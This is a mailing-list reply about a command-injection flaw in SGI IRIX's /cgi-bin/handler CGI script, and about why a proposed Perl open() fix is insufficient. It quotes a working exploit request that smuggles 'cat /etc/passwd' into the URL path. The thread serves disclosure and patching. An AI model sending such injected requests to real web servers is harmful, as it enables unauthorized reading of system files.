Re: /cgi-bin/handler - more notes

[mouse () RODENTS MONTREAL QC CA (der Mouse)]

> I have had reports that my exploit for SGI's /cgi-bin/handler does
> not work on IRIX 6.3 (on O2).  I analyzed the code provided with IRIX
> 6.3 and they tried to fix it, but they actually DID NOT.

> telnet target.machine.com 80
> GET /cgi-bin/handler/whatever;cat       /etc/passwd|    ?data=Download
> HTTP/1.0

> [...To fix this right...]
> All "open" commands should check if the their argument is really a
> filename.  You could use:

> -f $doc && open (INPUT, $doc)

If you have untrusted local users who can install their own cgi-bin
stuff (I know of at least one large site that is in this situation),
this isn't enough.  /cgi-bin/handler/whatever;cat\t/etc/passwd\|\t may
well exist, and open() will _still_ take it as a pipe.

> So far, IRIX versions 5.3, 6.2, and now 6.3 are vulnerable.
> Anyone on IRIX 6.4? :) (What does it run on BTW?)

I know of one site with an Octane that runs 6.4.  I'd try this, but
that site runs exactly one web server, and it ain't SGI's.  I could
turn on the web server on the Octane, I suppose, but I'm hesitant to
mess with it....

                                        der Mouse

                               mouse () rodents montreal qc ca
                     7D C8 61 52 5D E7 2D 39  4E F1 31 3E E8 B3 27 4B